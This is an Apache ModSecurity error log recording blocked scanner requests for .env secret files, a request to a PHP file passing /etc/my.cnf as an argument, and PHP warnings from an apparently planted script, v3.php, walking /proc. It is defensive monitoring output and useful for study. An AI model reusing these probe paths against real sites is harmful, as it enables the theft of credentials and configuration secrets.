[Tue May 12 03:53:07.971112 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/customer"] [unique_id "agKIA7OxS7i6i_mT2NLc7QAAAFQ"]
[Tue May 12 03:53:07.971374 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIA7OxS7i6i_mT2NLc7QAAAFQ"]
[Tue May 12 03:53:08.451954 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIBHo6NvB9WXx5V-6ORgAAAQY"]
[Tue May 12 03:53:08.452175 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIBHo6NvB9WXx5V-6ORgAAAQY"]
[Tue May 12 03:53:09.045904 2026] [security2:error] [pid 1730175:tid 1730183] [client 172.104.186.23:36864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKIBHo6NvB9WXx5V-6ORgAAAQY"]
[Tue May 12 03:53:10.083020 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d33edbdef20e478c630064aa07d4e72a||1778551287||1778550927"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/data"] [unique_id "agKIBrOxS7i6i_mT2NLc8QAAAFQ"]
[Tue May 12 03:53:10.083238 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/data"] [unique_id "agKIBrOxS7i6i_mT2NLc8QAAAFQ"]
[Tue May 12 03:53:10.083492 2026] [security2:error] [pid 1707624:tid 1707702] [client 172.104.186.23:34870] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agKIBrOxS7i6i_mT2NLc8QAAAFQ"]
PHP Warning:  filesize(): stat failed for /proc/1705307/task/1705307/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705307/task/1705307/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705307/task/1705307/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705307/task/1705307/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705307/task/1705307/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705307/task/1705307/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:54:09.365918 2026] [core:error] [pid 1730175:tid 1730199] [client 74.249.238.26:60362] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:09.365964 2026] [core:error] [pid 1730175:tid 1730199] [client 74.249.238.26:60362] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:12.520582 2026] [core:error] [pid 1691274:tid 1691280] [client 74.249.238.26:50241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:12.520613 2026] [core:error] [pid 1691274:tid 1691280] [client 74.249.238.26:50241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:13.074564 2026] [core:error] [pid 1730207:tid 1730228] [client 74.249.238.26:40542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:13.074594 2026] [core:error] [pid 1730207:tid 1730228] [client 74.249.238.26:40542] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:14.129067 2026] [core:error] [pid 1691274:tid 1691283] [client 74.249.238.26:60401] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:14.129097 2026] [core:error] [pid 1691274:tid 1691283] [client 74.249.238.26:60401] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:15.668934 2026] [security2:error] [pid 1709071:tid 1709106] [client 176.65.139.239:55076] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "cpc-entreprises.com"] [uri "/app/.env"] [unique_id "agKIR7vMumyrWMfSu7q87gAAANM"]
[Tue May 12 03:54:15.669156 2026] [security2:error] [pid 1709071:tid 1709106] [client 176.65.139.239:55076] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "cpc-entreprises.com"] [uri "/app/.env"] [unique_id "agKIR7vMumyrWMfSu7q87gAAANM"]
[Tue May 12 03:54:15.669405 2026] [security2:error] [pid 1709071:tid 1709106] [client 176.65.139.239:55076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "cpc-entreprises.com"] [uri "/app/.env"] [unique_id "agKIR7vMumyrWMfSu7q87gAAANM"]
[Tue May 12 03:54:16.823432 2026] [core:error] [pid 1730207:tid 1730232] [client 74.249.238.26:50252] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:16.823458 2026] [core:error] [pid 1730207:tid 1730232] [client 74.249.238.26:50252] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/81/task/81/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/81/task/81/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/81/task/81/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/81/task/81/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/81/task/81/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/81/task/81/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:54:18.842498 2026] [core:error] [pid 1691274:tid 1691285] [client 74.249.238.26:40530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:18.842534 2026] [core:error] [pid 1691274:tid 1691285] [client 74.249.238.26:40530] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:21.449126 2026] [security2:error] [pid 1709071:tid 1709091] [client 208.84.102.100:24424] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.pweil.com"] [uri "/app/.env"] [unique_id "agKITbvMumyrWMfSu7q88QAAAMQ"]
[Tue May 12 03:54:21.449126 2026] [security2:error] [pid 1691274:tid 1691289] [client 208.84.102.100:24440] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.pweil.com"] [uri "/api/.env"] [unique_id "agKITVfdQaraX_prmqcyIgAAAAw"]
[Tue May 12 03:54:21.449187 2026] [security2:error] [pid 1730207:tid 1730224] [client 208.84.102.100:24412] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.pweil.com"] [uri "/.env.local"] [unique_id "agKITTue9Sp-pIv_Bb6jfgAAAU8"]
[Tue May 12 03:54:21.449355 2026] [security2:error] [pid 1730207:tid 1730224] [client 208.84.102.100:24412] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.pweil.com"] [uri "/.env.local"] [unique_id "agKITTue9Sp-pIv_Bb6jfgAAAU8"]
[Tue May 12 03:54:21.449356 2026] [security2:error] [pid 1691274:tid 1691289] [client 208.84.102.100:24440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.pweil.com"] [uri "/api/.env"] [unique_id "agKITVfdQaraX_prmqcyIgAAAAw"]
[Tue May 12 03:54:21.449357 2026] [security2:error] [pid 1709071:tid 1709091] [client 208.84.102.100:24424] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.pweil.com"] [uri "/app/.env"] [unique_id "agKITbvMumyrWMfSu7q88QAAAMQ"]
[Tue May 12 03:54:21.449593 2026] [security2:error] [pid 1709071:tid 1709091] [client 208.84.102.100:24424] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.pweil.com"] [uri "/app/.env"] [unique_id "agKITbvMumyrWMfSu7q88QAAAMQ"]
[Tue May 12 03:54:21.449601 2026] [security2:error] [pid 1691274:tid 1691289] [client 208.84.102.100:24440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.pweil.com"] [uri "/api/.env"] [unique_id "agKITVfdQaraX_prmqcyIgAAAAw"]
[Tue May 12 03:54:21.449628 2026] [security2:error] [pid 1707624:tid 1707700] [client 208.84.102.100:24418] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.pweil.com"] [uri "/.env.production"] [unique_id "agKITbOxS7i6i_mT2NLdggAAAFI"]
[Tue May 12 03:54:21.449893 2026] [security2:error] [pid 1707624:tid 1707700] [client 208.84.102.100:24418] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.pweil.com"] [uri "/.env.production"] [unique_id "agKITbOxS7i6i_mT2NLdggAAAFI"]
[Tue May 12 03:54:21.450194 2026] [security2:error] [pid 1707624:tid 1707700] [client 208.84.102.100:24418] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.pweil.com"] [uri "/.env.production"] [unique_id "agKITbOxS7i6i_mT2NLdggAAAFI"]
[Tue May 12 03:54:21.450248 2026] [security2:error] [pid 1730207:tid 1730211] [client 208.84.102.100:24398] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.pweil.com"] [uri "/.env"] [unique_id "agKITTue9Sp-pIv_Bb6jfwAAAUI"]
[Tue May 12 03:54:21.450419 2026] [security2:error] [pid 1730207:tid 1730211] [client 208.84.102.100:24398] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.pweil.com"] [uri "/.env"] [unique_id "agKITTue9Sp-pIv_Bb6jfwAAAUI"]
[Tue May 12 03:54:21.450626 2026] [security2:error] [pid 1730207:tid 1730211] [client 208.84.102.100:24398] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.pweil.com"] [uri "/.env"] [unique_id "agKITTue9Sp-pIv_Bb6jfwAAAUI"]
[Tue May 12 03:54:21.451932 2026] [security2:error] [pid 1707624:tid 1707704] [client 208.84.102.100:24452] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.pweil.com"] [uri "/backend/.env"] [unique_id "agKITbOxS7i6i_mT2NLdgwAAAFY"]
[Tue May 12 03:54:21.452080 2026] [security2:error] [pid 1707624:tid 1707704] [client 208.84.102.100:24452] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.pweil.com"] [uri "/backend/.env"] [unique_id "agKITbOxS7i6i_mT2NLdgwAAAFY"]
[Tue May 12 03:54:21.452291 2026] [security2:error] [pid 1707624:tid 1707704] [client 208.84.102.100:24452] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.pweil.com"] [uri "/backend/.env"] [unique_id "agKITbOxS7i6i_mT2NLdgwAAAFY"]
[Tue May 12 03:54:21.494240 2026] [security2:error] [pid 1730207:tid 1730224] [client 208.84.102.100:24412] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.pweil.com"] [uri "/.env.local"] [unique_id "agKITTue9Sp-pIv_Bb6jfgAAAU8"]
[Tue May 12 03:54:21.803528 2026] [core:error] [pid 1730175:tid 1730191] [client 74.249.238.26:60404] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:21.803560 2026] [core:error] [pid 1730175:tid 1730191] [client 74.249.238.26:60404] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:22.225148 2026] [authz_core:error] [pid 1695975:tid 1695999] [client 216.73.216.110:13773] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Twig/error_log
[Tue May 12 03:54:27.638176 2026] [security2:error] [pid 1730207:tid 1730233] [client 216.73.216.110:13843] ModSecurity: Warning. Matched phrase "etc/my.cnf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/my.cnf found within ARGS:filesrc: /etc/my.cnf.mysqlup.10.6"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKIUzue9Sp-pIv_Bb6jhgAAAVg"]
[Tue May 12 03:54:27.638834 2026] [security2:error] [pid 1730207:tid 1730233] [client 216.73.216.110:13843] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agKIUzue9Sp-pIv_Bb6jhgAAAVg"]
[Tue May 12 03:54:27.724473 2026] [security2:error] [pid 1730207:tid 1730233] [client 216.73.216.110:13843] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKIUzue9Sp-pIv_Bb6jhgAAAVg"]
[Tue May 12 03:54:28.006860 2026] [core:error] [pid 1707624:tid 1707705] [client 74.249.238.26:60408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 03:54:28.006902 2026] [core:error] [pid 1707624:tid 1707705] [client 74.249.238.26:60408] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
